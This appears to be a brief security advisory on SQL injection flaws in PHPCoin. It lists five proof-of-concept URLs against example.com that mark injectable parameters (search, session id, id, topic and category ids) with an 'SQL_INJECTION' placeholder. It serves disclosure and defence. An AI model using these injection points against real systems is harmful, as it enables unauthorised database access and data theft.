|
PHPCoin Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concepts are available: http://www.example.com/index.php?title=Special%3aSearch&search=(SQL_INJECTION http://www.example.com/login.php?w=user&o=login&phpcoinsessid=SQL_INJECTION' http://www.example.com/mod.php?mod=siteinfo&id=SQL_INJECTION'&phpcoinsessid=8d4706204348394afece6b64db3d9b95 http://www.example.com/mod.php?mod=pages&mode=list&dtopic_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b http://www.example.com/mod.php?mod=pages&mode=list&dcat_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b |
|
|
Privacy Statement |